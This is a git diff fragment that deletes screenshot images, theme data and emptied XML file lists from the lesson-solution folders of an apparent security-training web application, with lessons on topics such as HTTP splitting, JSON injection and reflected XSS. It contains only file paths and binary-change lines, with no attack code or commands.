deleted file mode 100644
index 4f70cbce7..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image013.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image015.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image015.png
deleted file mode 100644
index 08c036f4e..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image015.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image017.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image017.png
deleted file mode 100644
index 9dccc349f..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image017.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image019.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image019.png
deleted file mode 100644
index 17708a3d7..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image019.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image021.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image021.png
deleted file mode 100644
index 59bec4ece..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image021.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image023.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image023.png
deleted file mode 100644
index 8887f463b..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image023.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image025.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image025.png
deleted file mode 100644
index 83279f010..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image025.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image027.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image027.png
deleted file mode 100644
index ac9b0590f..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image027.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image029.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image029.jpg
deleted file mode 100644
index 1f2923a0d..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image029.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image030.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image030.jpg
deleted file mode 100644
index 5c309829a..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image030.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image031.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image031.jpg
deleted file mode 100644
index 296995e6d..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image031.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image032.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image032.jpg
deleted file mode 100644
index 04b19c12d..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image032.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image033.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image033.jpg
deleted file mode 100644
index 1e20add5b..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image033.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image034.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image034.jpg
deleted file mode 100644
index cc30af047..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image034.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image035.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image035.jpg
deleted file mode 100644
index 0e01db1ea..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image035.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image036.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image036.jpg
deleted file mode 100644
index 51964a9bb..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image036.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image037.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image037.jpg
deleted file mode 100644
index 9f8efcbb7..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image037.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image038.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image038.jpg
deleted file mode 100644
index 036e50e47..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image038.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image039.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image039.jpg
deleted file mode 100644
index 81b54f365..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image039.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image040.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image040.jpg
deleted file mode 100644
index caf41923a..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image040.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image041.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image041.jpg
deleted file mode 100644
index cd100cf63..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image041.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image042.jpg b/src/main/webapp/lesson_solutions/HttpSplitting_files/image042.jpg
deleted file mode 100644
index 9a48ce5a4..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image042.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/themedata.thmx b/src/main/webapp/lesson_solutions/HttpSplitting_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/InsecureLogin_files/wireshark1.png b/src/main/webapp/lesson_solutions/InsecureLogin_files/wireshark1.png
deleted file mode 100644
index 135fc3606..000000000
Binary files a/src/main/webapp/lesson_solutions/InsecureLogin_files/wireshark1.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/JSONInjection_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/JSONInjection_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/filelist.xml b/src/main/webapp/lesson_solutions/JSONInjection_files/filelist.xml
deleted file mode 100644
index 3f7752feb..000000000
--- a/src/main/webapp/lesson_solutions/JSONInjection_files/filelist.xml
+++ /dev/null
@@ -1,18 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image001.png b/src/main/webapp/lesson_solutions/JSONInjection_files/image001.png
deleted file mode 100644
index cfdb7b042..000000000
Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image003.png b/src/main/webapp/lesson_solutions/JSONInjection_files/image003.png
deleted file mode 100644
index 217f69bd7..000000000
Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image005.png b/src/main/webapp/lesson_solutions/JSONInjection_files/image005.png
deleted file mode 100644
index affeaa193..000000000
Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image007.png b/src/main/webapp/lesson_solutions/JSONInjection_files/image007.png
deleted file mode 100644
index 709f70b6a..000000000
Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image009.png b/src/main/webapp/lesson_solutions/JSONInjection_files/image009.png
deleted file mode 100644
index b7d120e45..000000000
Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image011.png b/src/main/webapp/lesson_solutions/JSONInjection_files/image011.png
deleted file mode 100644
index 3d93d05e5..000000000
Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image013.jpg b/src/main/webapp/lesson_solutions/JSONInjection_files/image013.jpg
deleted file mode 100644
index 21504eb14..000000000
Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image013.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image014.jpg b/src/main/webapp/lesson_solutions/JSONInjection_files/image014.jpg
deleted file mode 100644
index cf6cc7471..000000000
Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image014.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image015.jpg b/src/main/webapp/lesson_solutions/JSONInjection_files/image015.jpg
deleted file mode 100644
index ccd96c071..000000000
Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image015.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image016.jpg b/src/main/webapp/lesson_solutions/JSONInjection_files/image016.jpg
deleted file mode 100644
index 3710a91c1..000000000
Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image016.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image017.jpg b/src/main/webapp/lesson_solutions/JSONInjection_files/image017.jpg
deleted file mode 100644
index fecffb54d..000000000
Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image017.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/image018.jpg b/src/main/webapp/lesson_solutions/JSONInjection_files/image018.jpg
deleted file mode 100644
index f4edbeeb7..000000000
Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/image018.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JSONInjection_files/themedata.thmx b/src/main/webapp/lesson_solutions/JSONInjection_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/JSONInjection_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/filelist.xml b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/filelist.xml
deleted file mode 100644
index aa9eb0b16..000000000
--- a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/filelist.xml
+++ /dev/null
@@ -1,29 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image001.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image001.png
deleted file mode 100644
index bb24a6c8f..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image002.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image002.jpg
deleted file mode 100644
index ac600b733..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image003.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image003.png
deleted file mode 100644
index 20f3f3871..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image004.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image004.jpg
deleted file mode 100644
index 0ffa3bfe7..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image005.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image005.png
deleted file mode 100644
index a189bb3d8..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image006.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image006.jpg
deleted file mode 100644
index 2e361f07f..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image007.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image007.png
deleted file mode 100644
index 2e74b5ec7..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image008.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image008.jpg
deleted file mode 100644
index 34cf88ebb..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image008.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image009.gif b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image009.gif
deleted file mode 100644
index 1779f251e..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image009.gif and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image010.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image010.png
deleted file mode 100644
index 88661381a..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image010.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image011.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image011.jpg
deleted file mode 100644
index ab68d0731..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image011.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image012.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image012.png
deleted file mode 100644
index 4d3ab3e2f..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image012.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image013.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image013.jpg
deleted file mode 100644
index 3ba19dd7e..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image013.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image014.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image014.png
deleted file mode 100644
index 90ea086b2..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image014.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image015.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image015.jpg
deleted file mode 100644
index 47033c76c..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image015.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image016.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image016.png
deleted file mode 100644
index 36393c423..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image016.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image017.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image017.jpg
deleted file mode 100644
index 02087fd18..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image017.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image018.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image018.png
deleted file mode 100644
index 6fa005b7c..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image018.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image019.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image019.jpg
deleted file mode 100644
index fa77e0a36..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image019.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image020.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image020.png
deleted file mode 100644
index 43737e5d1..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image020.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image021.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image021.jpg
deleted file mode 100644
index 9cde03d4b..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image021.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image022.png b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image022.png
deleted file mode 100644
index 24ef81f2b..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image022.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image023.jpg b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image023.jpg
deleted file mode 100644
index 8fbe215fd..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/image023.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/themedata.thmx b/src/main/webapp/lesson_solutions/JavaScriptValidation_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/JavaScriptValidation_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/Thumbs.db b/src/main/webapp/lesson_solutions/LogSpoofing_files/Thumbs.db
deleted file mode 100644
index c8864bbfb..000000000
Binary files a/src/main/webapp/lesson_solutions/LogSpoofing_files/Thumbs.db and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/LogSpoofing_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/LogSpoofing_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/filelist.xml b/src/main/webapp/lesson_solutions/LogSpoofing_files/filelist.xml
deleted file mode 100644
index 66f2f27d6..000000000
--- a/src/main/webapp/lesson_solutions/LogSpoofing_files/filelist.xml
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/image001.png b/src/main/webapp/lesson_solutions/LogSpoofing_files/image001.png
deleted file mode 100644
index 59ffaca93..000000000
Binary files a/src/main/webapp/lesson_solutions/LogSpoofing_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/image003.png b/src/main/webapp/lesson_solutions/LogSpoofing_files/image003.png
deleted file mode 100644
index 100684c5f..000000000
Binary files a/src/main/webapp/lesson_solutions/LogSpoofing_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/image005.png b/src/main/webapp/lesson_solutions/LogSpoofing_files/image005.png
deleted file mode 100644
index 0174b03b0..000000000
Binary files a/src/main/webapp/lesson_solutions/LogSpoofing_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/image007.jpg b/src/main/webapp/lesson_solutions/LogSpoofing_files/image007.jpg
deleted file mode 100644
index 50abf182f..000000000
Binary files a/src/main/webapp/lesson_solutions/LogSpoofing_files/image007.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/image008.jpg b/src/main/webapp/lesson_solutions/LogSpoofing_files/image008.jpg
deleted file mode 100644
index afd0c3eb3..000000000
Binary files a/src/main/webapp/lesson_solutions/LogSpoofing_files/image008.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/image009.jpg b/src/main/webapp/lesson_solutions/LogSpoofing_files/image009.jpg
deleted file mode 100644
index 259e28f16..000000000
Binary files a/src/main/webapp/lesson_solutions/LogSpoofing_files/image009.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/LogSpoofing_files/themedata.thmx b/src/main/webapp/lesson_solutions/LogSpoofing_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/LogSpoofing_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/MaliciousFileExecution_files/image001.jpg b/src/main/webapp/lesson_solutions/MaliciousFileExecution_files/image001.jpg
deleted file mode 100644
index 4c69a2352..000000000
Binary files a/src/main/webapp/lesson_solutions/MaliciousFileExecution_files/image001.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/MaliciousFileExecution_files/image002.jpg b/src/main/webapp/lesson_solutions/MaliciousFileExecution_files/image002.jpg
deleted file mode 100644
index 8a2189e3e..000000000
Binary files a/src/main/webapp/lesson_solutions/MaliciousFileExecution_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/login.png b/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/login.png
deleted file mode 100644
index 2cf17feb8..000000000
Binary files a/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/login.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/success.png b/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/success.png
deleted file mode 100644
index 3179d178e..000000000
Binary files a/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/success.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/tan.png b/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/tan.png
deleted file mode 100644
index 896334751..000000000
Binary files a/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/tan.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/webscarab.png b/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/webscarab.png
deleted file mode 100644
index 75acaa951..000000000
Binary files a/src/main/webapp/lesson_solutions/MultiLevelLogin1_files/webscarab.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/MultiLevelLogin2_files/success.png b/src/main/webapp/lesson_solutions/MultiLevelLogin2_files/success.png
deleted file mode 100644
index 86bad431a..000000000
Binary files a/src/main/webapp/lesson_solutions/MultiLevelLogin2_files/success.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/PasswordStrength_files/image001.jpg b/src/main/webapp/lesson_solutions/PasswordStrength_files/image001.jpg
deleted file mode 100644
index ea9895612..000000000
Binary files a/src/main/webapp/lesson_solutions/PasswordStrength_files/image001.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/PasswordStrength_files/image002.jpg b/src/main/webapp/lesson_solutions/PasswordStrength_files/image002.jpg
deleted file mode 100644
index ee40403cf..000000000
Binary files a/src/main/webapp/lesson_solutions/PasswordStrength_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/filelist.xml b/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/filelist.xml
deleted file mode 100644
index 496ea3696..000000000
--- a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/filelist.xml
+++ /dev/null
@@ -1,12 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image001.png b/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image001.png
deleted file mode 100644
index 089968f01..000000000
Binary files a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image002.jpg b/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image002.jpg
deleted file mode 100644
index 4d4b17604..000000000
Binary files a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image003.png b/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image003.png
deleted file mode 100644
index 0bc317162..000000000
Binary files a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image004.jpg b/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image004.jpg
deleted file mode 100644
index 7978fe44b..000000000
Binary files a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image005.png b/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image005.png
deleted file mode 100644
index 4f0de1d74..000000000
Binary files a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image006.jpg b/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image006.jpg
deleted file mode 100644
index 4d4491eb3..000000000
Binary files a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/themedata.thmx b/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/PathBasedAccessControl_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/Phishing_files/image001.jpg b/src/main/webapp/lesson_solutions/Phishing_files/image001.jpg
deleted file mode 100644
index 967ebaa4c..000000000
Binary files a/src/main/webapp/lesson_solutions/Phishing_files/image001.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ReflectedXSS_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/ReflectedXSS_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/ReflectedXSS_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/ReflectedXSS_files/filelist.xml b/src/main/webapp/lesson_solutions/ReflectedXSS_files/filelist.xml
deleted file mode 100644
index 8ebcbe37d..000000000
--- a/src/main/webapp/lesson_solutions/ReflectedXSS_files/filelist.xml
+++ /dev/null
@@ -1,10 +0,0 @@
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/ReflectedXSS_files/image001.png b/src/main/webapp/lesson_solutions/ReflectedXSS_files/image001.png
deleted file mode 100644
index 6ff72a45b..000000000
Binary files a/src/main/webapp/lesson_solutions/ReflectedXSS_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ReflectedXSS_files/image003.png b/src/main/webapp/lesson_solutions/ReflectedXSS_files/image003.png
deleted file mode 100644
index e44f2e566..000000000
Binary files a/src/main/webapp/lesson_solutions/ReflectedXSS_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ReflectedXSS_files/image005.jpg b/src/main/webapp/lesson_solutions/ReflectedXSS_files/image005.jpg
deleted file mode 100644
index 73cdb0bbf..000000000
Binary files a/src/main/webapp/lesson_solutions/ReflectedXSS_files/image005.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ReflectedXSS_files/image006.jpg b/src/main/webapp/lesson_solutions/ReflectedXSS_files/image006.jpg
deleted file mode 100644
index fb2e1977e..000000000
Binary files a/src/main/webapp/lesson_solutions/ReflectedXSS_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ReflectedXSS_files/themedata.thmx b/src/main/webapp/lesson_solutions/ReflectedXSS_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/ReflectedXSS_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/RemoteAdminFlaw_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
